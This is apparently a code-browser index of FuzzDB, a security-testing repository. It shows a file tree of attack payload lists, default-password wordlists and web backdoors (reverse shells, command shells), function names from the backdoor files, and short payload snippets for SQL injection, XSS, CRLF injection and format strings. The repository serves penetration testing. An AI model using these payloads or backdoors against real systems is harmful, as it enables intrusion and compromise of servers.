│ │ ├── Readme.md
│ │ └── mongodb.txt
│ ├── os-cmd-execution/
│ │ ├── Commands-Linux.txt
│ │ ├── Commands-OSX.txt
│ │ ├── Commands-Windows.txt
│ │ ├── Commands-WindowsPowershell.txt
│ │ ├── OSCommandInject.Windows.txt
│ │ ├── README.md
│ │ ├── command-execution-unix.txt
│ │ ├── command-injection-template.txt
│ │ ├── shell-delimiters.txt
│ │ ├── shell-operators.txt
│ │ ├── source-disc-cmd-exec-traversal.txt
│ │ ├── useful-commands-unix.txt
│ │ └── useful-commands-windows.txt
│ ├── os-dir-indexing/
│ │ └── directory-indexing.txt
│ ├── path-traversal/
│ │ ├── README.md
│ │ ├── path-traversal-windows.txt
│ │ └── traversals-8-deep-exotic-encoding.txt
│ ├── redirect/
│ │ ├── README.md
│ │ ├── redirect-injection-template.txt
│ │ └── redirect-urls-template.txt
│ ├── rfi/
│ │ ├── README.md
│ │ └── rfi.txt
│ ├── server-side-include/
│ │ └── server-side-includes-generic.txt
│ ├── sql-injection/
│ │ ├── detect/
│ │ │ ├── GenericBlind.txt
│ │ │ ├── Generic_SQLI.txt
│ │ │ ├── MSSQL.txt
│ │ │ ├── MSSQL_blind.txt
│ │ │ ├── MySQL.txt
│ │ │ ├── MySQL_MSSQL.txt
│ │ │ ├── README.md
│ │ │ ├── oracle.txt
│ │ │ └── xplatform.txt
│ │ ├── exploit/
│ │ │ ├── README.md
│ │ │ ├── db2-enumeration.txt
│ │ │ ├── ms-sql-enumeration.txt
│ │ │ ├── mysql-injection-login-bypass.txt
│ │ │ ├── mysql-read-local-files.txt
│ │ │ └── postgres-enumeration.txt
│ │ └── payloads-sql-blind/
│ │ ├── README.md
│ │ ├── payloads-sql-blind-MSSQL-INSERT.txt
│ │ ├── payloads-sql-blind-MSSQL-WHERE.txt
│ │ ├── payloads-sql-blind-MySQL-INSERT.txt
│ │ ├── payloads-sql-blind-MySQL-ORDER_BY.txt
│ │ └── payloads-sql-blind-MySQL-WHERE.txt
│ ├── string-expansion/
│ │ └── shell-expansion.txt
│ ├── unicode/
│ │ ├── README.md
│ │ ├── corrupted.txt
│ │ ├── emoji.txt
│ │ ├── japanese-emoticon.txt
│ │ ├── naughty-unicode.txt
│ │ ├── regionalindicators.txt
│ │ ├── right-to-left.txt
│ │ ├── specialchars.txt
│ │ ├── two-byte-chars.txt
│ │ └── upsidedown.txt
│ ├── xml/
│ │ └── xml-attacks.txt
│ ├── xpath/
│ │ ├── README.md
│ │ └── xpath-injection.txt
│ └── xss/
│ ├── JHADDIX_XSS_WITH_CONTEXT.doc.txt
│ ├── README.md
│ ├── XSSPolyglot.txt
│ ├── all-encodings-of-lt.txt
│ ├── default-javascript-event-attributes.txt
│ ├── html-event-attributes.txt
│ ├── test.xxe
│ ├── xss-other.txt
│ ├── xss-rsnake.txt
│ └── xss-uri.txt
├── discovery/
│ ├── URI_SCHEMES/
│ │ └── IANA_registerd_URI_schemes.txt
│ ├── UserAgent/
│ │ ├── UserAgentListCommon.txt
│ │ ├── UserAgentListLarge.txt
│ │ └── UserAgents.txt
│ ├── WebSocket/
│ │ └── WebSocket-subprotocols.txt
│ ├── common-methods/
│ │ └── common-methods.txt
│ ├── dns/
│ │ ├── CcTLD.txt
│ │ ├── alexaTop1mAXFRcommonSubdomains.txt
│ │ ├── dnsmapCommonSubdomains.txt
│ │ └── gTLD.txt
│ └── predictable-filepaths/
│ ├── KitchensinkDirectories.txt
│ ├── Randomfiles.txt
│ ├── UnixDotfiles.txt
│ ├── backdoors/
│ │ ├── ASP_CommonBackdoors.txt
│ │ ├── bot_control_panels.txt
│ │ └── shells.txt
│ ├── cgi/
│ │ ├── CGI_HTTP_POST.txt
│ │ ├── CGI_HTTP_POST_Windows.txt
│ │ ├── CGI_Microsoft.txt
│ │ └── CGI_XPlatform.txt
│ ├── cms/
│ │ ├── README.md
│ │ ├── drupal_plugins.txt
│ │ ├── drupal_themes.txt
│ │ ├── joomla_plugins.txt
│ │ ├── joomla_themes.txt
│ │ ├── php-nuke.txt
│ │ ├── wordpress.txt
│ │ ├── wp_common_theme_files.txt
│ │ ├── wp_plugins.txt
│ │ ├── wp_plugins_full.txt
│ │ ├── wp_plugins_top225.txt
│ │ ├── wp_themes.readme
│ │ └── wp_themes.txt
│ ├── filename-dirname-bruteforce/
│ │ ├── 3CharExtBrute.txt
│ │ ├── CommonWebExtensions.txt
│ │ ├── Extensions.Backup.txt
│ │ ├── Extensions.Common.txt
│ │ ├── Extensions.Compressed.txt
│ │ ├── Extensions.Mostcommon.txt
│ │ ├── Extensions.Skipfish.txt
│ │ ├── WordlistSkipfish.txt
│ │ ├── copy_of.txt
│ │ ├── raft-large-directories-lowercase.txt
│ │ ├── raft-large-directories.txt
│ │ ├── raft-large-extensions-lowercase.txt
│ │ ├── raft-large-extensions.txt
│ │ ├── raft-large-files-lowercase.txt
│ │ ├── raft-large-files.txt
│ │ ├── raft-large-words-lowercase.txt
│ │ ├── raft-large-words.txt
│ │ ├── raft-medium-directories-lowercase.txt
│ │ ├── raft-medium-directories.txt
│ │ ├── raft-medium-extensions-lowercase.txt
│ │ ├── raft-medium-extensions.txt
│ │ ├── raft-medium-files-lowercase.txt
│ │ ├── raft-medium-files.txt
│ │ ├── raft-medium-words-lowercase.txt
│ │ ├── raft-medium-words.txt
│ │ ├── raft-small-directories-lowercase.txt
│ │ ├── raft-small-directories.txt
│ │ ├── raft-small-extensions-lowercase.txt
│ │ ├── raft-small-extensions.txt
│ │ ├── raft-small-files-lowercase.txt
│ │ ├── raft-small-files.txt
│ │ ├── raft-small-words-lowercase.txt
│ │ ├── raft-small-words.txt
│ │ ├── spanish.txt
│ │ ├── test_demo.txt
│ │ └── upload_variants.txt
│ ├── login-file-locations/
│ │ ├── Logins.txt
│ │ ├── cfm.txt
│ │ ├── html.txt
│ │ ├── jsp.txt
│ │ ├── php.txt
│ │ ├── windows-asp.txt
│ │ └── windows-aspx.txt
│ ├── password-file-locations/
│ │ └── Passwords.txt
│ ├── php/
│ │ ├── PHP.txt
│ │ └── PHP_CommonBackdoors.txt
│ ├── proxy-conf.txt
│ ├── tftp.txt
│ ├── webservers-appservers/
│ │ ├── ADFS.txt
│ │ ├── AdobeXML.txt
│ │ ├── Apache.txt
│ │ ├── ApacheTomcat.txt
│ │ ├── Apache_Axis.txt
│ │ ├── ColdFusion.txt
│ │ ├── FatwireCMS.txt
│ │ ├── Frontpage.txt
│ │ ├── HP_System_Mgmt_Homepage.txt
│ │ ├── HTTP_POST_Microsoft.txt
│ │ ├── Hyperion.txt
│ │ ├── IIS.txt
│ │ ├── JBoss.txt
│ │ ├── JRun.txt
│ │ ├── JavaServlets_Common.txt
│ │ ├── Joomla_exploitable.txt
│ │ ├── LotusNotes.txt
│ │ ├── Netware.txt
│ │ ├── Oracle9i.txt
│ │ ├── OracleAppServer.txt
│ │ ├── README.md
│ │ ├── Ruby_Rails.txt
│ │ ├── SAP.txt
│ │ ├── Sharepoint.txt
│ │ ├── SiteMinder.txt
│ │ ├── SunAppServerGlassfish.txt
│ │ ├── SuniPlanet.txt
│ │ ├── Vignette.txt
│ │ ├── Weblogic.txt
│ │ └── Websphere.txt
│ └── wellknown-rfc5785.txt
├── docs/
│ ├── attack-docs/
│ │ ├── rfi-cheatsheet.html
│ │ ├── source-directory-file-indexing-cheatsheet.html
│ │ ├── sqli/
│ │ │ └── docs.sql_injection_cheatsheet.html
│ │ ├── waf-bypass/
│ │ │ └── regexp-security-cheatsheet.md
│ │ └── xss/
│ │ └── docs.wasc-scriptmapping/
│ │ ├── ScriptMapping_Release_26Nov2007.html
│ │ └── license.txt
│ └── misc/
│ ├── KL0209LIT_fffap.html
│ └── htmlcodes-cheatsheet.htm
├── regex/
│ ├── README.md
│ ├── amazon.txt
│ ├── breakpoint-ignores.txt
│ ├── errors.txt
│ ├── nsa-wordlist.txt
│ ├── pii.readme.txt
│ ├── pii.txt
│ └── sessionid.txt
├── web-backdoors/
│ ├── README.md
│ ├── asp/
│ │ ├── cmd-asp-5.1.asp
│ │ ├── cmd.asmx
│ │ ├── cmd.asp
│ │ ├── cmd.aspx
│ │ ├── cmdasp.asp
│ │ ├── cmdasp.aspx
│ │ ├── dns.asp
│ │ ├── file.asp
│ │ ├── list.asp
│ │ ├── list.txt
│ │ ├── ntdaddy.asp
│ │ ├── proxy.asp
│ │ ├── shell.asp
│ │ ├── shell.aspx
│ │ └── up.asp
│ ├── c/
│ │ └── cmd.c
│ ├── cfm/
│ │ ├── cfExec.cfm
│ │ ├── cfSQL.cfm
│ │ ├── cmd.cfm
│ │ └── shell.cfm
│ ├── jsp/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ ├── UpServlet.java
│ │ ├── browser.jsp
│ │ ├── cmd.jsp
│ │ ├── cmdjsp.jsp
│ │ ├── jsp-reverse.jsp
│ │ ├── laudanum/
│ │ │ ├── cmd.war
│ │ │ ├── makewar.sh
│ │ │ └── warfiles/
│ │ │ ├── META-INF/
│ │ │ │ └── MANIFEST.MF
│ │ │ ├── WEB-INF/
│ │ │ │ └── web.xml
│ │ │ └── cmd.jsp
│ │ ├── list.jsp
│ │ ├── simple.jsp
│ │ ├── up.jsp
│ │ └── win32/
│ │ ├── cmd_win32.jsp
│ │ └── up_win32.jsp
│ ├── php/
│ │ ├── cmd.php
│ │ ├── dns.php
│ │ ├── file.php
│ │ ├── host.php
│ │ ├── killnc.php
│ │ ├── list.php
│ │ ├── php-backdoor.php
│ │ ├── php-reverse-shell.php
│ │ ├── proxy.php
│ │ ├── shell.php
│ │ ├── simple-backdoor.php
│ │ ├── tiny.php
│ │ └── up.php
│ ├── pl-cgi/
│ │ ├── cmd.pl
│ │ ├── list.pl
│ │ ├── perlcmd.cgi
│ │ └── up.pl
│ ├── servlet/
│ │ ├── CmdServlet.java
│ │ ├── ListServlet.java
│ │ └── UpServlet.java
│ ├── sh/
│ │ ├── cmd.sh
│ │ ├── list.sh
│ │ └── up.sh
│ └── wordpress/
│ ├── laudanum.php
│ └── templates/
│ ├── README.md
│ ├── dns.php
│ ├── file.php
│ ├── host.php
│ ├── ipcheck.php
│ ├── killnc.php
│ ├── php-reverse-shell.php
│ ├── proxy.php
│ ├── settings.php
│ └── shell.php
├── wordlists-misc/
│ ├── accidental_profanity.txt
│ ├── common-http-ports.txt
│ ├── numeric.txt
│ ├── resolvers.txt
│ ├── us_cities.txt
│ ├── wordlist-alphanumeric-case.txt
│ ├── wordlist-common-snmp-community-strings.txt
│ └── wordlist-dna.txt
└── wordlists-user-passwd/
├── db2/
│ ├── db2_default_pass.txt
│ ├── db2_default_user.txt
│ └── db2_default_userpass.txt
├── faithwriters.txt
├── generic-listpairs/
│ ├── http_default_pass.txt
│ ├── http_default_userpass.txt
│ └── http_default_users.txt
├── names/
│ └── namelist.txt
├── oracle/
│ ├── _hci_oracle_passwords.txt
│ ├── _oracle_default_passwords.txt
│ ├── oracle_login_password.txt
│ ├── oracle_logins.txt
│ └── oracle_passwords.txt
├── passwds/
│ ├── john.txt
│ ├── phpbb.txt
│ ├── twitter.txt
│ └── weaksauce.txt
├── postgres/
│ ├── postgres_default_pass.txt
│ ├── postgres_default_user.txt
│ └── postgres_default_userpass.txt
├── readme.txt
├── tomcat/
│ ├── tomcat_mgr_default_pass.txt
│ ├── tomcat_mgr_default_userpass.txt
│ └── tomcat_mgr_default_users.txt
└── unix-os/
├── unix_passwords.txt
└── unix_users.txt
SYMBOL INDEX (68 symbols across 22 files)
FILE: web-backdoors/c/cmd.c
function main (line 48) | int main(int argc, char **argv) {
FILE: web-backdoors/jsp/CmdServlet.java
class CmdServlet (line 13) | public class CmdServlet extends HttpServlet {
method doGet (line 15) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method getServletInfo (line 39) | public String getServletInfo() {
FILE: web-backdoors/jsp/ListServlet.java
class ListServlet (line 12) | public class ListServlet extends HttpServlet
method doGet (line 16) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method getServletInfo (line 83) | public String getServletInfo() {
FILE: web-backdoors/jsp/UpServlet.java
class UpServlet (line 13) | public class UpServlet extends HttpServlet {
method doGet (line 15) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method doPost (line 27) | public void doPost(HttpServletRequest req, HttpServletResponse res) th...
method getServletInfo (line 67) | public String getServletInfo() {
FILE: web-backdoors/php/dns.php
function error_handler (line 62) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/php/file.php
function error_handler (line 63) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/php/host.php
function error_handler (line 61) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/php/killnc.php
function error_handler (line 64) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/php/php-reverse-shell.php
function printit (line 183) | function printit ($string) {
FILE: web-backdoors/php/proxy.php
function error_handler (line 64) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
function geturlarray (line 96) | function geturlarray($u) {
function buildurl (line 104) | function buildurl ($u) {
function buildurlpath (line 119) | function buildurlpath ($u) {
function getfilename (line 144) | function getfilename ($u) {
function getcontenttype (line 153) | function getcontenttype ($headers) {
function getcontentencoding (line 162) | function getcontentencoding ($headers) {
function removeheader (line 170) | function removeheader($header, $headers) {
function rewritecookies (line 179) | function rewritecookies($headers) {
function getsessionid (line 190) | function getsessionid($headers) {
function compatible_gzinflate (line 198) | function compatible_gzinflate($gzData) {
function rewrite (line 221) | function rewrite ($d, $u) {
FILE: web-backdoors/php/shell.php
function error_handler (line 70) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
function logout (line 103) | function logout() {
function stripslashes_deep (line 111) | function stripslashes_deep($value) {
FILE: web-backdoors/servlet/CmdServlet.java
class CmdServlet (line 13) | public class CmdServlet extends HttpServlet {
method doGet (line 15) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method getServletInfo (line 39) | public String getServletInfo() {
FILE: web-backdoors/servlet/ListServlet.java
class ListServlet (line 12) | public class ListServlet extends HttpServlet
method doGet (line 16) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method getServletInfo (line 83) | public String getServletInfo() {
FILE: web-backdoors/servlet/UpServlet.java
class UpServlet (line 13) | public class UpServlet extends HttpServlet {
method doGet (line 15) | public void doGet(HttpServletRequest req, HttpServletResponse res) thr...
method doPost (line 27) | public void doPost(HttpServletRequest req, HttpServletResponse res) th...
method getServletInfo (line 67) | public String getServletInfo() {
FILE: web-backdoors/wordpress/laudanum.php
class WP_Laudanum (line 53) | class WP_Laudanum
method __construct (line 56) | public function __construct()
method __activate (line 61) | public function __activate()
method __deactivate (line 66) | public function __deactivate()
method add_menu (line 71) | public function add_menu()
method plugin_settings_page (line 76) | public function plugin_settings_page()
function plugin_settings_link (line 93) | function plugin_settings_link($links)
FILE: web-backdoors/wordpress/templates/dns.php
function error_handler (line 45) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/wordpress/templates/file.php
function wpl_error_handler (line 49) | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcont...
FILE: web-backdoors/wordpress/templates/host.php
function error_handler (line 45) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/wordpress/templates/killnc.php
function error_handler (line 48) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
FILE: web-backdoors/wordpress/templates/php-reverse-shell.php
function printit (line 185) | function printit ($string) {
FILE: web-backdoors/wordpress/templates/proxy.php
function error_handler (line 49) | function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
function geturlarray (line 81) | function geturlarray($u) {
function buildurl (line 89) | function buildurl ($u) {
function buildurlpath (line 104) | function buildurlpath ($u) {
function getfilename (line 129) | function getfilename ($u) {
function getcontenttype (line 138) | function getcontenttype ($headers) {
function getcontentencoding (line 147) | function getcontentencoding ($headers) {
function removeheader (line 155) | function removeheader($header, $headers) {
function rewritecookies (line 164) | function rewritecookies($headers) {
function getsessionid (line 175) | function getsessionid($headers) {
function compatible_gzinflate (line 183) | function compatible_gzinflate($gzData) {
function rewrite (line 206) | function rewrite ($d, $u) {
FILE: web-backdoors/wordpress/templates/shell.php
function wpl_error_handler (line 49) | function wpl_error_handler($errno, $errstr, $errfile, $errline, $errcont...
function logout (line 82) | function logout() {
function wpl_stripslashes_deep (line 90) | function wpl_stripslashes_deep($value) {
Copy disabled (too large)
Download .json
Condensed preview — 375 files, each showing path, character count, and a content snippet. Download the .json file for the full structured content (17,588K chars).
[
{
"path": ".gitignore",
"chars": 11,
"preview": "*.DS_Store\n"
},
{
"path": "README.md",
"chars": 6564,
"preview": "FuzzDB was created to increase the likelihood of finding application security vulnerabilities through dynamic applicatio"
},
{
"path": "_copyright.txt",
"chars": 3284,
"preview": "Copyright (c) 2010-2019, Adam Muntner\nAll rights reserved.\n\nRedistribution and use in source and binary forms, with or w"
},
{
"path": "attack/README.md",
"chars": 255,
"preview": "<h1>FuzzDB Attack Patterns</h1>\n\n**WAF Evasion** <br>\n* <a href=../master/docs/attack-docs/waf-bypass/regexp-security-ch"
},
{
"path": "attack/all-attacks/all-attacks-unix.txt",
"chars": 13351,
"preview": "\n!\n!'\n!@#$%%^#$%#$@#$%$$@#$%^^**(()\n!@#0%^#0##018387@#0^^**(()\n\"\n\" or \"a\"=\"a\n\" or \"x\"=\"x\n\" or 0=0 #\n\" or 0=0 --\n\" or 1=1"
},
{
"path": "attack/all-attacks/all-attacks-win.txt",
"chars": 13204,
"preview": "# a wide sample of malicious input for windows targets\nA\nTRUE\nFALSE\n0\n00\n1\n-1\n1.0\n-1.0\n2\n-2\n-20\n65536\n268435455\n-2684354"
},
{
"path": "attack/all-attacks/all-attacks-xplatform.txt",
"chars": 816,
"preview": "!'\n!@#$%%^#$%#$@#$%$$@#$%^^**(()\n!@#0%^#0##018387@#0^^**(()\n\"><script>\"\n\">xxx<P>yyy\n\"\\t\"\n#\n#'\n#'\n#xA\n#xA#xD\n#xD\n#xD"
},
{
"path": "attack/authentication/README.md",
"chars": 210,
"preview": "\nphp_magic_hashes.fuzz.txt - See, https://www.whitehatsec.com/blog/magic-hashes/\n\"the following “magic” strings are subs"
},
{
"path": "attack/authentication/php_magic_hashes.fuzz.txt",
"chars": 744,
"preview": "00e00099\n00e05651056780370631793326323796\n00e1839085851394356611454660337505469745\n00e2521569708250889666329543741175098"
},
{
"path": "attack/business-logic/CommonDebugParamNames.txt",
"chars": 346,
"preview": "7357=1\n7357=true\n7357=y\n7357=yes\naccess=1\naccess=true\naccess=y\naccess=yes\nadm=1\nadm1n=1\nadm1n=true\nadm1n=y\nadm1n=yes\nadm"
},
{
"path": "attack/business-logic/CommonMethodNames.txt",
"chars": 443,
"preview": "0\n1\nadd\nadmin\nalert\nalter\nauth\nauthenticate\nappend\ncalc\ncalculate\ncancel\nchange\ncheck\nclear\nclick\nclone\nclose\ncreate\ncry"
},
{
"path": "attack/business-logic/DebugParams.Json.fuzz.txt",
"chars": 505,
"preview": "\"7357\":1\n\"7357\":true\n\"7357\":\"y\"\n\"7357\":yes\"\n\"access\":1\n\"access\":true\n\"access\":\"y\"\n\"access\":\"yes\"\n\"adm\":1\n\"adm\":true\n\"adm"
},
{
"path": "attack/control-chars/HexValsAllBytes.txt",
"chars": 1024,
"preview": "%00\n%01\n%02\n%03\n%04\n%05\n%06\n%07\n%08\n%09\n%0a\n%0b\n%0c\n%0d\n%0e\n%0f\n%10\n%11\n%12\n%13\n%14\n%15\n%16\n%17\n%18\n%19\n%1a\n%1b\n%1c\n%1d\n"
},
{
"path": "attack/control-chars/NullByteRepresentations.txt",
"chars": 1943,
"preview": "%00\n%00%00\n\\0\n\\0\\\n\\00\n\\00\\\n\\0\\0\n\\0\\0\\\n\\0\\0\n\\00\\00\\\n\\000\n\\000\\\n\\0000\n\\0000\\\n\\x00\n\\x00\\\n\\x00\\x00\n\\x00\\x00\\\n\\x0000\n\\x0000\\\n"
},
{
"path": "attack/control-chars/imessage.txt",
"chars": 34,
"preview": "Powerلُلُصّبُلُلصّبُررً ॣ ॣh ॣ ॣ冗\n"
},
{
"path": "attack/control-chars/terminal-escape-codes.txt",
"chars": 172,
"preview": "Roses are \u001b[0;31mred\u001b[0m, violets are \u001b[0;34mblue. Hope you enjoy terminal hue\nBut now...\u001b[20Cfor my greatest trick...\u001b["
},
{
"path": "attack/control-chars/true.txt",
"chars": 69,
"preview": "TRUE\ntrue\n1\n-1\n4294967295\n0xFFFFFFFF\n\\FFFFFFFF\n\\FFFFFFFF\\\n\\xFFFFFFFF\n"
},
{
"path": "attack/disclosure-directory/directory-indexing-generic.txt",
"chars": 312,
"preview": "/%3f.jsp\n/?M=D\n/?S=D \n//////////////////////////////////////////////////////////////////////////////////////////////////"
},
{
"path": "attack/disclosure-localpaths/unix/common-unix-httpd-log-locations.txt",
"chars": 801,
"preview": "/apache/logs/error.log \n/apache/logs/access.log \n/apache/logs/error.log \n/apache/logs/access.log \n/apache/logs/error.log"
},
{
"path": "attack/disclosure-source/README.md",
"chars": 458,
"preview": "Notes:\n\n**source-disc-cmd-exec-traversal.txt**\n\n single directory traversals that have caused showcode or command exec i"
},
{
"path": "attack/disclosure-source/source-disc-cmd-exec-traversal.txt",
"chars": 64,
"preview": "..%255c\n.%5c../..%5c\n/..%c0%9v../\n/..%c0%af../\n/..%255c..%255c\n\n"
},
{
"path": "attack/disclosure-source/source-disclosure-generic.txt",
"chars": 47,
"preview": "%70\n.%E2%73%70\n%2e0\n%2e\n.\n\\\n?*\n%20\n%00\n%2f\n%5c\n"
},
{
"path": "attack/disclosure-source/source-disclosure-microsoft.txt",
"chars": 71,
"preview": "# microsoft-specific appends - try the generic list, too\n+.htr\n::DATA$\n"
},
{
"path": "attack/email/invalid-email-addresses.txt",
"chars": 736,
"preview": "justastring\r\nemail@addrese.com;secondemail@address.com\r\n@address.com\r\nJacco Van Tuijl <email@example.com>\r\nemail.address"
},
{
"path": "attack/email/valid-email-addresses.txt",
"chars": 1027,
"preview": "email@eaddress.com\nfirstname.lastname@address.com\nemail@subdomain.address.com\nfirstname+lastname@address.com\nname@129.12"
},
{
"path": "attack/file-upload/README.md",
"chars": 3642,
"preview": "File Upload Fuzzfiles- File Name Filter Bypass Notes \n\nsee: http://cwe.mitre.org/data/definitions/434.html\n\n* kinds of "
},
{
"path": "attack/file-upload/alt-extensions-asp.txt",
"chars": 364,
"preview": "asp\naspx\nasa\naSP\naSpx\naSa\nasp%20%20%20\naspx%20%20%20\nasa%20%20%20\naSP%20%20%20\naSpx%20%20%20\naSa%20%20%20\nasp......\naspx"
},
{
"path": "attack/file-upload/alt-extensions-coldfusion.txt",
"chars": 483,
"preview": "cfm\ncfml\ncfc\ndbm\ncFm\ncFml\ncFc\ndBm\ncfm%20%20%20\ncfml%20%20%20\ncfc%20%20%20\ndbm%20%20%20\ncFm%20%20%20\ncFml%20%20%20\ncFc%20"
},
{
"path": "attack/file-upload/alt-extensions-jsp.txt",
"chars": 620,
"preview": "jsp\njspx\njsw\njsv\njspf\njSp\njSpx\njSw\njSv\njSpf\njSp%00\njSp%20%20%20\njSp%20%20%20...%20.%20..a\njSp......\njSpf%00\njSpf%20%20%2"
},
{
"path": "attack/file-upload/alt-extensions-perl.txt",
"chars": 320,
"preview": "# .pm .lib cannot be called directly, must be called as modules\npl\npm\ncgi\npL\npM\ncGi\nlib\nlIb\ncGi%00\ncGi%20%20%20\ncGi....."
},
{
"path": "attack/file-upload/alt-extensions-php.txt",
"chars": 760,
"preview": "phtml\nphp\nphp3\nphp4\nphp5\ninc \npHtml\npHp\npHp3\npHp4\npHp5\niNc\niNc%00\niNc%20%20%20\niNc%20%20%20...%20.%20..\niNc......\ninc%0"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-commonly-writable-directories.txt",
"chars": 79,
"preview": "templates_compiled\ntemplates_c\ntemplates\ntemporary\nimages\ncache\ntemp\nfiles\ntmp\n"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-microsoft-asp-filetype-bf.txt",
"chars": 147,
"preview": "{ASPSCRIPT}\n{ASPSCRIPT}.{EXT}\n{ASPSCRIPT};\n{ASPSCRIPT};.{EXT}\n{ASPSCRIPT}%00\n{ASPSCRIPT}%00.{EXT}\n{ASPSCRIPT}::data%00.\n"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-microsoft-asp.txt",
"chars": 1451,
"preview": "{ASPSCRIPT}\n{ASPSCRIPT};\n{ASPSCRIPT};.jpg\n{ASPSCRIPT};.pdf\n{ASPSCRIPT};.html\n{ASPSCRIPT};.htm\n{ASPSCRIPT};.txt\n{ASPSCRIP"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-ms-php.txt",
"chars": 139,
"preview": "{PHPSCRIPT}\n{PHPSCRIPT}.phtml\n{PHPSCRIPT}.php.html\n{PHPSCRIPT}.php::$DATA\n{PHPSCRIPT}.php.php.rar \n{PHPSCRIPT}.php.rar \n"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-x-platform-generic.txt",
"chars": 32,
"preview": "%00index.html\n;index.html\n%00 \n"
},
{
"path": "attack/file-upload/file-ul-filter-bypass-x-platform-php.txt",
"chars": 97,
"preview": "{PHPSCRIPT}\n{PHPSCRIPT}.phtml\n{PHPSCRIPT}.php.html\n{PHPSCRIPT}.php.php.rar \n{PHPSCRIPT}.php.rar \n"
},
{
"path": "attack/file-upload/invalid-filenames-linux.txt",
"chars": 34,
"preview": "/\n\n\\0\n/dev/null\n/dev/null/foo\n.\n.."
},
{
"path": "attack/file-upload/invalid-filenames-microsoft.txt",
"chars": 459,
"preview": "A:\nZZ:\nCON\nPRN\nAUX\nCLOCK$\nNUL\nCOM1\nCOM2\nCOM3\nCOM4\nCOM5\nCOM6\nCOM7\nCOM8\nCOM9\nLPT1\nLPT2\nLPT3\nLPT4\nLPT5\nLPT6\nLPT7\nLPT8\nLPT9\n"
},
{
"path": "attack/file-upload/invalid-filesystem-chars-microsoft.txt",
"chars": 35,
"preview": "* \n. \n\" \n/ \n\\ \n[ \n] \n: \n; \n| \n= \n,\n"
},
{
"path": "attack/file-upload/invalid-filesystem-chars-osx.txt",
"chars": 279,
"preview": "# list of invalid characters for osx - these can be used to attempt to cause an error condition during file upload bypas"
},
{
"path": "attack/file-upload/malicious-images/README.md",
"chars": 2880,
"preview": "From SecLists:\n\n## lottapixel\n\nOriginally reported at https://hackerone.com/reports/390, addressed on paperclip.\n\nA spec"
},
{
"path": "attack/file-upload/malicious-images/eicar.com.txt",
"chars": 68,
"preview": "X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"
},
{
"path": "attack/format-strings/format-strings.txt",
"chars": 2406,
"preview": "%s%p%x%d\n%p%p%p%p\n%x%x%x%x\n%d%d%d%d\n%s%s%s%s\n%99999999999s\n%08x\n%20d\n%20n\n%20x\n%20s\n%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d"
},
{
"path": "attack/html_js_fuzz/HTML5sec_Injections.txt",
"chars": 18155,
"preview": "<form id=\"test\"></form><button form=\"test\" formaction=\"javascript:alert(1)\">X</button>\n<meta charset=\"x-imap4-modified-u"
},
{
"path": "attack/html_js_fuzz/html_attributes.txt",
"chars": 1508,
"preview": "accept\naccept-charset\naccesskey\naction\nalign\nalt\nasync\nautocomplete\nautofocus\nautoplay\nbgcolor\nborder\nchallenge\ncharset\n"
},
{
"path": "attack/html_js_fuzz/html_tags.txt",
"chars": 672,
"preview": "!-- --\n!DOCTYPE\na\nabbr\nacronym\naddress\napplet\narea\narticle\naside\naudio\nb\nbase\nbasefont\nbdi\nbdo\nbig\nblockquote\nbody\nbr\nbu"
},
{
"path": "attack/html_js_fuzz/javascript_events.txt",
"chars": 767,
"preview": "onafterprint\nonbeforeprint\nonbeforeonload\nonblur\nonerror\nonfocus\nonhaschange\nonload\nonmessage\nonoffline\nononline\nonpageh"
},
{
"path": "attack/html_js_fuzz/js_inject.txt",
"chars": 286,
"preview": "function(){ return this.userid}\n' function(){ return this.username} or '1'='1\nfunction(){return version()}\nfunction(){re"
},
{
"path": "attack/html_js_fuzz/quotationmarks.txt",
"chars": 106,
"preview": "'\n\"\n''\n\"\"\n'\"'\n\"''''\"'\"\n\"'\"'\"''''\"\n<foo val=“bar” />\n<foo val=“bar” />\n<foo val=”bar“ />\n<foo val=`bar' />\n"
},
{
"path": "attack/http-protocol/README.md",
"chars": 100,
"preview": "References:\n\nhttps://web.archive.org/web/20150426090054/http://ha.ckers.org/response-splitting.html\n"
},
{
"path": "attack/http-protocol/crlf-injection.txt",
"chars": 1258,
"preview": "%0d%0a\n%0d%0a%0d%0a\nr%0d%0aContentLength:%200%0d%0a%0d%0aHTTP/1.1%20200%20OK%0d%0aContentType:%20text/html%0d%0aContentL"
},
{
"path": "attack/http-protocol/docs.http-method-defs.html",
"chars": 20795,
"preview": "<html>\r\n\r\n<head>\r\n<meta http-equiv=Content-Type content=\"text/html; charset=windows-1252\">\r\n<meta name=Generator content"
},
{
"path": "attack/http-protocol/hpp.txt",
"chars": 547,
"preview": "# HTTP paramter polution and interpretation payloads by Jacco van Tuijl\n?id=id=1\n&id=1?id=2\n?id['&id=1']=2\n?id[1&id=2]=1"
},
{
"path": "attack/http-protocol/http-header-cache-poison.txt",
"chars": 717,
"preview": "# Header Injection / Cache Poison 1.0 (fuzz the entire get req) (12 April 2010)\n# creative commons license http://creat"
},
{
"path": "attack/http-protocol/http-protocol-methods.txt",
"chars": 374,
